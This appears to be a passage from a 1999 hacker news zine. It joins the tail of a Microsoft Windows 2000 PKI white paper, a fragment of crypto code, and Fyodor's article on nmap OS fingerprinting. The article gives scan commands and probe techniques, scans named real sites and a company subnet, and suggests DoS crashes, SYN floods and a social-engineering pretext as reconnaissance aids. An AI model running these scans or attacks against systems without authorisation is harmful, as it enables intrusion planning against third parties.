operation, each EFS user generates a public-key pair and obtains an EFS certificate. The certificate is issued by an enterprise CA in the Windows 2000 domain, although EFS generates a self-signed certificate for stand-alone operation where data sharing is not an issue. In addition, Windows 2000 supports an EFS recovery policy in which trusted recovery agents can be designated. These agents generate an EFS recovery public-key pair and are issued an EFS recovery certificate by the enterprise CA. The certificates of the EFS recovery agents are published to domain clients with the Group Policy object. In operation, for each file to be encrypted, EFS creates a random key that is used to encrypt the file. The user's EFS public key is then used to encrypt this secret key and associate it with the file. In addition, a copy of the secret key, encrypted with each recovery agent's EFS public key, is associated with the file. No plaintext copy of the secret key is stored in the system. When retrieving the file, EFS transparently unwraps the copy of the secret key encrypted with the user's public key, using the user's private key. This is then used to decrypt the file in real time during file read and write operations. Similarly, a recovery agent may decrypt the file by using the private key to access the secret key. Smart-Card Logon Windows 2000 introduces PK-based smart-card logon as an alternative to passwords for domain authentication. This relies on a PC/SC Workgroup-compliant smart-card infrastructure, first introduced for Windows NT and Windows 95 in December 1997, and RSA-capable smart cards with supporting CryptoAPI CSPs. The authentication process makes use of the PKINIT protocol, proposed by the IETF Kerberos working group, to integrate PK-based authentication with the Windows 2000 Kerberos access-control system. In operation, the system recognizes a smart-card insertion event as an alternative to the standard CTRL + ALT + DEL secure attention sequence to initiate a logon. The user is then prompted for the smart-card PIN code, which controls access to operations with the private key stored on the smart card. In this system, the smart card also contains a copy of the user's certificate (issued by an enterprise CA). This allows the user to roam within the domain. IP Security (IPSec) IPSec defines protocols for network encryption at the IP protocol layer. IPSec does not require PK-based technology and can use shared-secret keys that are communicated securely through an out-of-band mechanism at the network end-points for encryption. The IETF IPSec working group recognized, however, that PK-based technology offers a practical solution to create a scalable distributed trust architecture, in particular, one in which IPSec devices can mutually authenticate each other and agree upon encryption keys without reliance on prearranged shared secrets. The IPSec community, including Microsoft, is actively working on standards for interoperable certificates and certificate enrollment and management protocols. Although a level of interoperability has been demonstrated, there is still work required to ensure broad interoperability across IPSec devices and PKI implementations. Microsoft is committed to developing its Windows 2000 PKI in conjunction with these evolving standards. Interoperability Criteria In an ideal world, a PKI would be exactly that: an infrastructure. CAs would issue a suite of completely interoperable certificates based on a standard certificate-request protocol. Applications would then evaluate them in a consistent manner (including whether they have been revoked), and there would be no ambiguity in either the syntactic or semantic interpretation anywhere in the process. The industry has yet to achieve this level of interoperability. As more applications take advantage of PK-based technology, relatively seamless interoperability is achievable. Today, SSL/TLS and S/MIME work well across multiple vendor products. Newer applications, such as code signing and digitally signed forms are not yet reliable. More troublesome is the fact that there is no current technical mechanism to compare names in two different language encodings. Unicode, for example, allows accented characters to be encoded in multiple equivalent forms. In the future, at least two major forces will drive interoperability: Initial trials, followed by a growing dependence on PK-based systems. Greater emphasis on standards. Microsoft is actively involved in the development of PK-relevant standards and is committed to building a product based on accepted current standards to maximize interoperability. Internet Standards Internet standards do not ensure interoperability, although they help. The historic problem with standards is that commercial product deployment outpaces the collaborative process. This has been especially true in PK technology, where the IETF currently has multiple working groups actively developing proposed standards for PK-based technology. Many of the applications that are potential beneficiaries of these standards are already shipping products. Moreover, no standard can anticipate every application requirement and dependency. Even the most comprehensive standards must be adapted in implementation. Interoperability, then, is the result of standards tempered by market realities. The IETF working group charged with defining the basis for an interoperable PKI is PKIX (X.509). After almost three full years of work, the basic architecture is in place. The specification, RFC 2459, Internet Public Key Infrastructure X.509 Certificate and CRL Profile, Part 1 is available at ftp://ftp.isi.edu/in-notes/rfc2459.txt. Microsoft is heavily involved in work on this standard within the IETF and is committed to assuring that its PKI products are compliant with it. Once ratified, this will become an important factor in defining a robust PKI that ensures certificates that can be requested, interpreted, and revoked in some standard way. There are also a number of other efforts within the IETF that may have significant impact on PKI interoperability. These are being driven by the needs of PK-based applications, notably TLS, S/MIME, and IPSec. In each case, these applications made it necessary to define a PKIX subset that meets their needs; often they supersede PKIX-defined functionality. Although this could appear to fragment the process, it does create a close-in feedback loop for the PKI designers. It is not surprising, then, that the most aggressive set of application-dependent standards are products of the IETF S/MIME working group (http://www.ietf.org/ids.by.wg/smime.html). Of these, the (S/MIME) Cryptographic Message Syntax, S/MIME Version 3 Message Specification, S/MIME Version 3 Certificate Handling, and Certificate Request Syntax are the most important. The S/MIME community, like TLS before it, has the advantage of starting with a de facto standard. PKIX also started with a standard (X.509), but this has proven inadequate as a basis for interoperable PK-based systems. This means that PKIX Part 1, the base IETF standard, is gaining experience from the applications that are trying to use it. A recent example of the feedback process is certificate chain verification. PKIX Part 1 suggests, but does not specify, a certificate-chain validation algorithm. One possible interpretation of the current Internet draft is that name-chaining (that is, matching the certificate issuer name against a CA name in the subject field of the parent certificate) must always be enforced, even if information such as AuthorityKeyIdentifier (issuer of a public key) is present. An inherent problem with this approach, however, is that it does not accommodate two significant public-key environments: one where there is no directory available to locate CA certificate by name, and complex ones where there is a complex web of cross-certified CAs. The PKIX working group did not encounter this class of problem until applications tried to generalize their chain validation algorithms and found that they could not. The positive effect of this is that the feedback loop is working, and the new mechanism is now reflected in the standard. There is also an important forcing function on the horizon for PKI interoperability. The National Institute of Standards (NIST) has established an interoperability work group, consisting of AT&T, CertCo, Certicom, Cylink, Digital Signature Trust, Dynacorp, Entrust, Frontier Technologies, GTE, ID Certify, MasterCard, Microsoft, Motorola, Spyrus, VeriSign, and Visa. The goal of this project is to ensure minimum interoperability between the members' implementations of PKIX Part 1. NIST is optimistic that this forum will resolve any ambiguities and/or errors in the new PKIX standard. Another factor in defining PKI standards lies entirely outside the IETF. There is a set of de facto cryptographic message standards (PKCS) developed and maintained by RSA Laboratories (http://www.rsa.com/rsalabs/html/standards.html) that is already broadly deployed in products. The PKCS standards, first published in 1990, include syntax for cryptographic messages. The standards that are most relevant to PKI are PKCS-7, Cryptographic Message Syntax Standard, and PKCS-10, Certification Request Syntax Standard. The significance of the RSA standards is that they provide a basic, but well-understood framework for interoperability. In fact, when the PKIX working group proposed another standard for certificate management, the S/MIME working group created its own proposal based on PKCS. This response is typical of IETF practices and reflects market awareness. De facto standards are often the best kind, and Microsoft has taken advantage of these standards in its current PKI implementation to maximize interoperability. It is fair to expect the standards process to lay the groundwork, but it is ultimately some subset of its standards that multiple vendors incorporate in their products to create interoperable solutions. A good example of the role that market forces play in the determination of PK interoperability is how trust models work. The term infrastructure implies that PKIs themselves can be linked together. If, for example, a department within a company chooses Vendor A's PKI model for its application and the company later chooses Vendor B for its mail system, it makes sense that there should be some natural overlap. It gets slightly more complicated when Company A and Company B want to selectively join their PKIs in a business-specific extranet. The technical complexity comes from having to map the trust relationships (who trusts whom for what) between the entities and keep track of them over time. There are currently three competing models for how trust relationships should work: Rooted hierarchies (for example, VeriSign, Microsoft, and Netscape) Networks (for example, Entrust) Webs (for example, PGP) Each of these three trust models assumes something different about how trust relationships are established and maintained, whether they are created directly or through an intermediary. Different trust models probably will not interoperate seamlessly. At best, sufficient flexibility can be built into a PKI, along with supporting administrative tools, to allow users to integrate separate trust models in a way that makes sense for specific business reasons. Preparing for Windows 2000 PKI S/MIME-based E-mail Using Exchange Server Public Key Infrastructure–based security is relatively new, and there are very few case studies of actual PKI deployment. To deploy PKI on a wide scale, a corporation must educate its users, understand the key/certificate management issues, and understand the risks and liabilities associated with PKI. There are a number of companies that can provide assistance on these issues. A list is available at www.microsoft.com/security/partners/. One of the most common areas that can benefit from the use of PKI security is e-mail. Using S/MIME, which is based on PKI, customers can send digitally signed and encrypted e-mail. Through the use of S/MIME-based e-mail, corporations can start deploying PKI and build up experience and expertise. Microsoft recommends that customers who want to deploy PKI start with Microsoft Exchange Server 5.5 (SP1) and the Microsoft Outlook 98 messaging and collaboration client, which offers S/MIME based e-mail. The key pieces of a PKI are included in Microsoft Exchange and Microsoft Outlook are: Key Management server with built-in key recovery features. X.509 version 3 Certificate Server. LDAP-based Exchange directory service. S/MIME clients (Outlook) using CryptoAPI. Microsoft Exchange Server 5.5 with Microsoft Outlook provides secure e-mail, along with key recovery features and the ability to have multiple Key Management servers and a certificate trust hierarchy. Microsoft will provide a migration path for Exchange users to move to the more generalized PKI infrastructure provided by Windows 2000, which includes a common enterprise directory service (the Active Directory) and a common Enterprise Certificate Authority. In a future release, Microsoft will make the Key Management server a more general-purpose system that other applications can use. For More Information For the latest information on Windows 2000 Server and Windows NT, visit the Web site at http://www.microsoft.com/ntserver, the Microsoft security site at http://www.microsoft.com/security, and the Windows NT Server Forum on the Microsoft Network (GO WORD: MSNTS). OSAll © 1998, 1999 Owl Services and Mike Hudack. Owl Services is not responsible for any content herein, and expects all visitors to act responsibly. OSAll stands for Owl Site All. Editorial content does not necessarily reflect the opinion of OSAll, Burst! Media or its´ advertisers. Owl Services would like to thank Attrition.org, Hacker News Network and Real Secure. -- EOF ) print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 (www.insecure.org) Written: October 18, 1998 Last Modified: April 10, 1999 [French Translation by Arhuman ] [Portuguese Translation by Frank Ned ] This paper may be freely distributed. The latest copy should always be available at http://www.insecure.org/nmap/nmap-fingerprinting-article.html ABSTRACT This paper discusses how to glean precious information about a host by querying its TCP/IP stack. I first present some of the "classical" methods of determining host OS which do not involve stack fingerprinting. Then I describe the current "state of the art" in stack fingerprinting tools. Next comes a description of many techniques for causing the remote host to leak information about itself. Finally I detail my (nmap) implementation of this, followed by a snapshot gained from nmap which discloses what OS is running on many popular Internet sites. REASONS I think the usefulness of determining what OS a system is running is pretty obvious, so I'll make this section short. One of the strongest examples of this usefulness is that many security holes are dependent on OS version. Lets say you are doing a penetration test and you find port 53 open. If this is a vulnerable version of Bind, you only get one chance to exploit it since a failed attempt will crash the daemon. With a good TCP/IP fingerprinter, you will quickly find that this machine is running 'Solaris 2.51' or 'Linux 2.0.35' and you can adjust your shellcode accordingly. A worse possibility is someone scanning 500,000 hosts in advance to see what OS is running and what ports are open. Then when someone posts (say) a root hole in Sun's comsat daemon, our little cracker could grep his list for 'UDP/512' and 'Solaris 2.6' and he immediately has pages and pages of rootable boxes. It should be noted that this is SCRIPT KIDDIE behavior. You have demonstrated no skill and nobody is even remotely impressed that you were able to find some vulnerable .edu that had not patched the hole in time. Also, people will be even less impressed if you use your newfound access to deface the department's web site with a self-aggrandizing rant about how damn good you are and how stupid the sysadmins must be. Another possible use is for social engineering. Lets say that you are scanning your target company and nmap reports a 'Datavoice TxPORT PRISM 3000 T1 CSU/DSU 6.22/2.06'. The hacker might now call up as 'Datavoice support' and discuss some issues about their PRISM 3000. "We are going to announce a security hole soon, but first we want all our current customers to install the patch -- I just mailed it to you ..." Some naive administrators might assume that only an authorized engineer from Datavoice would know so much about their CSU/DSU. Another potential use of this capability is evaluation of companies you may want to do business with. Before you choose a new ISP, scan them and see what equipment is in use. Those "$99/year" deals don't sound nearly so good when you find out they have crappy routers and offer PPP services off a bunch of Windows boxes. CLASSICAL TECHNIQUES Stack fingerprinting solves the problem of OS identification in a unique way. I think this technique holds the most promise, but there are currently many other solutions. Sadly, this is still one the most effective of those techniques: playground~> telnet hpux.u-aizu.ac.jp Trying 163.143.103.12 ... Connected to hpux.u-aizu.ac.jp. Escape character is '^]'. HP-UX hpux B.10.01 A 9000/715 (ttyp2) login: There is no point going to all this trouble of fingerprinting if the machine will blatantly announce to the world exactly what it is running! Sadly, many vendors ship current systems with these kind of banners and many admins do not turn them off. Just because there are other ways to figure out what OS is running (such as fingerprinting), does not mean we should just announce our OS and architecture to every schmuck who tries to connect. The problems with relying on this technique are that an increasing number of people are turning banners off, many systems don't give much information, and it is trivial for someone to "lie" in their banners. Nevertheless, banner reading is all you get for OS and OS Version checking if you spend $thousands on the commercial ISS scanner. Download nmap or queso instead and save your money :). Even if you turn off the banners, many applications will happily give away this kind of information when asked. For example lets look at an FTP server: payfonez> telnet ftp.netscape.com 21 Trying 207.200.74.26 ... Connected to ftp.netscape.com. Escape character is '^]'. 220 ftp29 FTP server (UNIX(r) System V Release 4.0) ready. SYST 215 UNIX Type: L8 Version: SUNOS First of all, it gives us system details in its default banner. Then if we give the 'SYST' command it happily feeds back even more information. If anon FTP is supported, we can often download /bin/ls or other binaries and determine what architecture it was built for. Many other applications are too free with information. Take web servers for example: playground> echo 'GET / HTTP/1.0\n' | nc hotbot.com 80 | egrep '^Server:' Server: Microsoft-IIS/4.0 playground> Hmmm ... I wonder what OS those lamers are running. Other classic techniques include DNS host info records (rarely effective) and social engineering. If the machine is listening on 161/udp (snmp), you are almost guaranteed a bunch of detailed info using 'snmpwalk' from the CMU SNMP tools distribution and the 'public' community name. CURRENT FINGERPRINTING PROGRAMS Nmap is not the first OS recognition program to use TCP/IP fingerprinting. The common IRC spoofer sirc by Johan has included very rudimentary fingerprinting techniques since version 3 (or earlier). It attempts to place a host in the classes "Linux", "4.4BSD", "Win95", or "Unknown" using a few simple TCP flag tests. Another such program is checkos, released publicly in January of this year by Shok in Confidence Remains High Issue #7. The fingerprinting techniques are exactly the same as SIRC, and even the code is identical in many places. Checkos was privately available for a long time prior to the public release, so I have no idea who swiped code from whom. But neither seems to credit the other. One thing checkos does add is telnet banner checking, which is useful but has the problems described earlier. [ Update: Shok wrote in to say that chekos was never intended to be public and this is why he didn't bother to credit SIRC for some of the code. ] Su1d also wrote an OS checking program. His is called SS and as of Version 3.11 it can identify 12 different OS types. I am somewhat partial to this one since he credits my nmap program for some of the networking code :). Then there is queso. This program is the newest and it is a huge leap forward from the other programs. Not only do they introduce a couple new tests, but they were the first (that I have seen) to move the OS fingerprints out of the code. The other scanners included code like: /* from ss */ if ((flagsfour & TH_RST) && (flagsfour & TH_ACK) && (winfour == 0) && (flagsthree & TH_ACK)) reportos(argv[2],argv[3],"Livingston Portmaster ComOS"); Instead, queso moves this into a configuration file which obviously scales much better and makes adding an OS as easy as appending a few lines to a fingerprint file. Queso was written by Savage, one of the fine folks at Apostols.org . One problem with all the programs describe above is that they are very limited in the number of fingerprinting tests which limits the granularity of answers. I want to know more than just 'this machine is OpenBSD, FreeBSD, or NetBSD', I wish to know exactly which of those it is as well as some idea of the release version number. In the same way, I would rather see 'Solaris 2.6' than simply 'Solaris'. To achieve this response granularity, I worked on a number of fingerprinting techniques which are described in the next section. FINGERPRINTING METHODOLOGY There are many, many techniques which can be used to fingerprint networking stacks. Basically, you just look for things that differ among operating systems and write a probe for the difference. If you combine enough of these, you can narrow down the OS very tightly. For example nmap can reliably distinguish Solaris 2.4 vs. Solaris 2.5-2.51 vs Solaris 2.6. It can also tell Linux kernel 2.0.30 from 2.0.31-34 or 2.0.35. Here are some techniques: The FIN probe -- Here we send a FIN packet (or any packet without an ACK or SYN flag) to an open port and wait for a response. The correct RFC 793 behavior is to NOT respond, but many broken implementations such as MS Windows, BSDI, CISCO, HP/UX, MVS, and IRIX send a RESET back. Most current tools utilize this technique. The BOGUS flag probe -- Queso is the first scanner I have seen to use this clever test. The idea is to set an undefined TCP "flag" ( 64 or 128) in the TCP header of a SYN packet. Linux boxes prior to 2.0.35 keep the flag set in their response. I have not found any other OS to have this bug. However, some operating systems seem to reset the connection when they get a SYN+BOGUS packet. This behavior could be useful in identifying them. TCP ISN Sampling -- The idea here is to find patterns in the initial sequence numbers chosen by TCP implementations when responding to a connection request. These can be categorized in to many groups such as the traditional 64K (many old UNIX boxes), Random increments (newer versions of Solaris, IRIX, FreeBSD, Digital UNIX, Cray, and many others), True "random" (Linux 2.0.*, OpenVMS, newer AIX, etc). Windows boxes (and a few others) use a "time dependent" model where the ISN is incremented by a small fixed amount each time period. Needless to say, this is almost as easily defeated as the old 64K behavior. Of course my favorite technique is "constant". The machines ALWAYS use the exact same ISN :). I've seen this on some 3Com hubs (uses 0x803) and Apple LaserWriter printers (uses 0xC7001). You can also subclass groups such as random incremental by computing variances, greatest common divisors, and other functions on the set of sequence numbers and the differences between the numbers. It should be noted that ISN generation has important security implications. For more information on this, contact "security expert" Tsutomu "Shimmy" Shimomura at SDSC and ask him how he was owned. Nmap is the first program I have seen to use this for OS identification. Don't Fragment bit -- Many operating systems are starting to set the IP "Don't Fragment" bit on some of the packets they send. This gives various performance benefits (though it can also be annoying -- this is why nmap fragmentation scans do not work from Solaris boxes). In any case, not all OS's do this and some do it in different cases, so by paying attention to this bit we can glean even more information about the target OS. I haven't seen this one before either. TCP Initial Window -- This simply involves checking the window size on returned packets. Older scanners simply used a non-zero window on a RST packet to mean "BSD 4.4 derived". Newer scanners such as queso and nmap keep track of the exact window since it is actually pretty constant by OS type. This test actually gives us a lot of information, since some operating systems can be uniquely identified by the window alone (for example, AIX is the only OS I have seen which uses 0x3F25). In their "completely rewritten" TCP stack for NT5, Microsoft uses 0x402E. Interestingly, that is exactly the number used by OpenBSD and FreeBSD. ACK Value -- Although you would think this would be completely standard, implementations differ in what value they use for the ACK field in some cases. For example, lets say you send a FIN|PSH|URG to a closed TCP port. Most implementations will set the ACK to be the same as your initial sequence number, though Windows and some stupid printers will send your seq + 1. If you send a SYN|FIN|URG|PSH to an open port, Windows is very inconsistent. Sometimes it sends back your seq, other times it sends S++, and still other times is sends back a seemingly random value. One has to wonder what kind of code MS is writing that changes its mind like this. ICMP Error Message Quenching -- Some (smart) operating systems follow the RFC 1812 suggestion to limit the rate at which various error messages are sent. For example, the Linux kernel (in net/ipv4/icmp.h) limits destination unreachable message generation to 80 per 4 seconds, with a 1/4 second penalty if that is exceeded. One way to test this is to send a bunch of packets to some random high UDP port and count the number of unreachables received. I have not seen this used before, and in fact I have not added this to nmap (except for use in UDP port scanning). This test would make the OS detection take a bit longer since you need to send a bunch of packets and wait for them to return. Also dealing with the possibility of packets dropped on the network would be a pain. ICMP Message Quoting -- The RFCs specify that ICMP error messages quote some small amount of an ICMP message that causes various errors. For a port unreachable message, almost all implementations send only the required IP header + 8 bytes back. However, Solaris sends back a bit more and Linux sends back even more than that. The beauty with this is it allows nmap to recognize Linux and Solaris hosts even if they don't have any ports listening. ICMP Error message echoing integrity -- I got this idea from something Theo De Raadt (lead OpenBSD developer) posted to comp.security.unix. As mentioned before, machines have to send back part of your original message along with a port unreachable error. Yet some machines tend to use your headers as 'scratch space' during initial processing and so they are a bit warped by the time you get them back. For example, AIX and BSDI send back an IP 'total length' field that is 20 bytes too high. Some BSDI, FreeBSD, OpenBSD, ULTRIX, and VAXen fuck up the IP ID that you sent them. While the checksum is going to change due to the changed TTL anyway, there are some machines (AIX, FreeBSD, etc.) which send back an inconsistent or 0 checksum. Same thing goes with the UDP checksum. All in all, nmap does nine different tests on the ICMP errors to sniff out subtle differences like these. Type of Service -- For the ICMP port unreachable messages I look at the type of service (TOS) value of the packet sent back. Almost all implementations use 0 for this ICMP error although Linux uses 0xC0. This does not indicate one of the standard TOS values, but instead is part of the unused (AFAIK) precedence field. I do not know why this is set, but if they change to 0 we will be able to keep identifying the old versions and we will be able to identify between old and new. Fragmentation Handling -- This is a favorite technique of Thomas H. Ptacek of Secure Networks, Inc (now owned by a bunch of Windows users at NAI). This takes advantage of the fact that different implementations often handle overlapping IP fragments differently. Some will overwrite the old portions with the new, and in other cases the old stuff has precedence. There are many different probes you can use to determine how the packet was reassembled. I did not add this capability since I know of no portable way to send IP fragments (in particular, it is a bitch on Solaris). For more information on overlapping fragments, you can read their IDS paper (www.secnet.com). TCP Options -- These are truly a gold mine in terms of leaking information. The beauty of these options is that: 1) They are generally optional (duh!) :) so not all hosts implement them. 2) You know if a host implements them by sending a query with an option set. The target generally show support of the option by setting it on the reply. 3) You can stuff a whole bunch of options on one packet to test everything at once. Nmap sends these options along with almost every probe packet: Window Scale=10; NOP; Max Segment Size = 265; Timestamp; End of Ops; When you get your response, you take a look at which options were returned and thus are supported. Some operating systems such as recent FreeBSD boxes support all of the above, while others, such as Linux 2.0.X support very few. The latest Linux 2.1.x kernels do support all of the above. On the other hand, they are more vulnerable to TCP sequence prediction. Go figure. Even if several operating systems support the same set of options, you can sometimes distinguish them by the values of the options. For example, if you send a small MSS value to a Linux box, it will generally echo that MSS back to you. Other hosts will give you different values. And even if you get the same set of supported options AND the same values, you can still differentiate via the order that the options are given, and where padding is applied. For example Solaris returns 'NNTNWME' which means: While Linux 2.1.122 returns MENNTNW. Same options, same values, but different order! I have not seen any other OS detection tools utilizes TCP options, but it is very useful. There are a few other useful options I might probe for at some point, such as those that support T/TCP and selective acknowledgements. Exploit Chronology -- Even with all the tests above, nmap is unable to distinguish between the TCP stacks of Win95, WinNT, or Win98. This is rather surprising, especially since Win98 came out about 4 years after Win95. You would think they would have bothered to improve the stack in some way (like supporting more TCP options) and so we would be able to detect the change and distinguish the operating systems. Unfortunately, this is not the case. The NT stack is apparently the same crappy stack they put into '95. And they didn't bother to upgrade it for '98. But do not give up hope, for there is a solution. You can simply start with early Windows DOS attacks (Ping of Death, Winnuke, etc) and move up a little further to attacks such as Teardrop and Land. After each attack, ping them to see whether they have crashed. When you finally crash them, you will likely have narrowed what they are running down to one service pack or hotfix. I have not added this functionality to nmap, although I must admit it is very tempting :). SYN Flood Resistance -- Some operating systems will stop accepting new connections if you send too many forged SYN packets at them (forging the packets avoids trouble with your kernel resetting the connections). Many operating systems can only handle 8 packets. Recent Linux kernels (among other operating systems) allow various methods such as SYN cookies to prevent this from being a serious problem. Thus you can learn something about your target OS by sending 8 packets from a forged source to an open port and then testing whether you can establish a connection to that port yourself. This was not implemented in nmap since some people get upset when you SYN flood them. Even explaining that you were simply trying to determine what OS they are running might not help calm them. NMAP IMPLEMENTATION AND RESULTS I have created a reference implementation of the OS detection techniques mentioned above (except those I said were excluded). I have added this to my Nmap scanner which has the advantage that it already knows what ports are open and closed for fingerprinting so you do not have to tell it. It is also portable among Linux, *BSD, and Solaris 2.51 and 2.6, and some other operating systems. The new version of nmap reads a file filled with Fingerprint templates that follow a simple grammar. Here is an example: FingerPrint IRIX 6.2 - 6.4 # Thanks to Lamont Granquist TSeq(Class=i800) T1(DF=N%W=C000|EF2A%ACK=S++%Flags=AS%Ops=MNWNNT) T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) T3(Resp=Y%DF=N%W=C000|EF2A%ACK=O%Flags=A%Ops=NNT) T4(DF=N%W=0%ACK=O%Flags=R%Ops=) T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=) T6(DF=N%W=0%ACK=O%Flags=R%Ops=) T7(DF=N%W=0%ACK=S%Flags=AR%Ops=) PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E) Lets look at the first line (I'm adding '>' quote markers): > FingerPrint IRIX 6.2 - 6.3 # Thanks to Lamont Granquist This simply says that the fingerprint covers IRIX versions 6.2 through 6.3 and the comment states that Lamont Granquist kindly sent me the IP addresses or fingerprints of the IRIX boxes tested. > TSeq(Class=i800) This means that ISN sampling put it in the "i800 class". This means that each new sequence number is a multiple of 800 greater than the last one. > T1(DF=N%W=C000|EF2A%ACK=S++%Flags=AS%Ops=MNWNNT) The test is named T1 (for test1, clever eh?). In this test we send a SYN packet with a bunch of TCP options to an open port. DF=N means that the "Don't fragment" bit of the response must not be set. W=C000|EF2A means that the window advertisement we received must be 0xC000 or EF2A. ACK=S++ means the acknowledgement we receive must be our initial sequence number plus 1. Flags = AS means the ACK and SYN flags were sent in the response. Ops = MNWNNT means the options in the response must be (in this order): > T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) Test 2 involves a NULL with the same options to an open port. Resp=Y means we must get a response. Ops= means that there must not be any options included in the response packet. If we took out '%Ops=' entirely then any options sent would match. > T3(Resp=Y%DF=N%W=400%ACK=S++%Flags=AS%Ops=M) Test 3 is a SYN|FIN|URG|PSH w/options to an open port. > T4(DF=N%W=0%ACK=O%Flags=R%Ops=) This is an ACK to an open port. Note that we do not have a Resp= here. This means that lack of a response (such as the packet being dropped on the network or an evil firewall) will not disqualify a match as long as all the other tests match. We do this because virtually any OS will send a response, so a lack of response is generally an attribute of the network conditions and not the OS itself. We put the Resp tag in tests 2 and 3 because some operating systems do drop those without responding. > T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=) > T6(DF=N%W=0%ACK=O%Flags=R%Ops=) > T7(DF=N%W=0%ACK=S%Flags=AR%Ops=) These tests are a SYN, ACK, and FIN|PSH|URG, respectively, to a closed port. The same options as always are set. Of course this is all probably obvious given the descriptive names 'T5', 'T6', and 'T7' :). > PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E) This big sucker is the 'port unreachable' message test. You should recognize the DF=N by now. TOS=0 means that IP type of service field was 0. The next two fields give the (hex) values of the IP total length field of the message IP header and the total length given in the IP header they are echoing back to us. RID=E means the RID value we got back in the copy of our original UDP packet was expected (ie the same as we sent). RIPCK=E means they didn't fuck up the checksum (if they did, it would say RIPCK=F). UCK=E means the UDP checksum is also correct. Next comes the UDP length which was 0x134 and DAT=E means they echoed our UDP data correctly. Since most implementations (including this one) do not send any of our UDP data back, they get DAT=E by default. The version of nmap with this functionality is currently in the 6th private beta cycle. It may be out by the time you read this in Phrack. Then again, it might not. See http://www.insecure.org/nmap/ for the latest version. POPULAR SITE SNAPSHOTS Here is the fun result of all our effort. We can now take random Internet sites and determine what OS they are using. A lot of these people have eliminated telnet banners, etc. to keep this information private. But this is of no use with our new fingerprinter! Also this is a good way to expose the users as the lamers that they are :)! The command used in these examples was: nmap -sS -p 80 -O -v Also note that most of these scans were done on 10/18/98. Some of these folks may have upgraded/changed servers since then. Note that I do not like every site on here. # "Hacker" sites or (in a couple cases) sites that think they are www.l0pht.com => OpenBSD 2.2 - 2.4 www.insecure.org => Linux 2.0.31-34 www.rhino9.ml.org => Windows 95/NT # No comment :) www.technotronic.com => Linux 2.0.31-34 www.nmrc.org => FreeBSD 2.2.6 - 3.0 www.cultdeadcow.com => OpenBSD 2.2 - 2.4 www.kevinmitnick.com => Linux 2.0.31-34 # Free Kevin! www.2600.com => FreeBSD 2.2.6 - 3.0 Beta www.antionline.com => FreeBSD 2.2.6 - 3.0 Beta www.rootshell.com => Linux 2.0.35 # Changed to OpenBSD after # they got owned. # Security vendors, consultants, etc. www.repsec.com => Linux 2.0.35 www.iss.net => Linux 2.0.31-34 www.checkpoint.com => Solaris 2.5 - 2.51 www.infowar.com => Win95/NT # Vendor loyalty to their OS www.li.org => Linux 2.0.35 # Linux International www.redhat.com => Linux 2.0.31-34 # I wonder what distribution :) www.debian.org => Linux 2.0.35 www.linux.org => Linux 2.1.122 - 2.1.126 www.sgi.com => IRIX 6.2 - 6.4 www.netbsd.org => NetBSD 1.3X www.openbsd.org => Solaris 2.6 # Ahem :) www.freebsd.org => FreeBSD 2.2.6-3.0 Beta # Ivy league www.harvard.edu => Solaris 2.6 www.yale.edu => Solaris 2.5 - 2.51 www.caltech.edu => SunOS 4.1.2-4.1.4 # Hello! This is the 90's :) www.stanford.edu => Solaris 2.6 www.mit.edu => Solaris 2.5 - 2.51 # Coincidence that so many good # schools seem to like Sun? # Perhaps it is the 40% # .edu discount :) www.berkeley.edu => UNIX OSF1 V 4.0,4.0B,4.0D www.oxford.edu => Linux 2.0.33-34 # Rock on! # Lamer sites www.aol.com => IRIX 6.2 - 6.4 # No wonder they are so insecure :) www.happyhacker.org => OpenBSD 2.2-2.4 # Sick of being owned, Carolyn? # Even the most secure OS is # useless in the hands of an # incompetent admin. # Misc www.lwn.net => Linux 2.0.31-34 # This Linux news site rocks! www.slashdot.org => Linux 2.1.122 - 2.1.126 www.whitehouse.gov => IRIX 5.3 sunsite.unc.edu => Solaris 2.6 Notes: In their security white paper, Microsoft said about their lax security: "this assumption has changed over the years as Windows NT gains popularity largely because of its security features.". Hmm, from where I stand it doesn't look like Windows is very popular among the security community :). I only see 2 Windows boxes from the whole group, and Windows is easy for nmap to distinguish since it is so broken (standards wise). And of course, there is one more site we must check. This is the web site of the ultra-secret Transmeta corporation. Interestingly the company was funded largely by Paul Allen of Microsoft, but it employs Linus Torvalds. So do they stick with Paul and run NT or do they side with the rebels and join the Linux revolution? Let us see: We use the command: nmap -sS -F -o transmeta.log -v -O www.transmeta.com//24 This says SYN scan for known ports (from /etc/services), log the results to 'transmeta.log', be verbose about it, do an OS scan, and scan the class 'C' where www.transmeta.com resides. Here is the gist of the results: neon-best.transmeta.com (206.184.214.10) => Linux 2.0.33-34 www.transmeta.com (206.184.214.11) => Linux 2.0.30 neosilicon.transmeta.com (206.184.214.14) => Linux 2.0.33-34 ssl.transmeta.com (206.184.214.15) => Linux unknown version linux.kernel.org (206.184.214.34) => Linux 2.0.35 www.linuxbase.org (206.184.214.35) => Linux 2.0.35 ( possibly the same machine as above ) Well, I think this answers our question pretty clearly :). ACKNOWLEDGEMENTS The only reason Nmap is currently able to detect so many different operating systems is that many people on the private beta team went to a lot of effort to search out new and exciting boxes to fingerprint! In particular, Jan Koum, van Hauser, Dmess0r, David O'Brien, James W. Abendschan, Solar Designer, Chris Wilson, Stuart Stock, Mea Culpa, Lamont Granquist, Dr. Who, Jordan Ritter, Brett Eldridge, and Pluvius sent in tons of IP addresses of wacky boxes and/or fingerprints of machines not reachable through the Internet. Thanks to Richard Stallman for writing GNU Emacs. This article would not be so well word-wrapped if I was using vi or cat and ^D. Questions and comments can be sent to fyodor@DHP.com (if that doesn't work for some reason, use fyodor@insecure.org). Nmap can be obtained from http://www.insecure.org/nmap . @HWA !=----------=- -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read om for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. 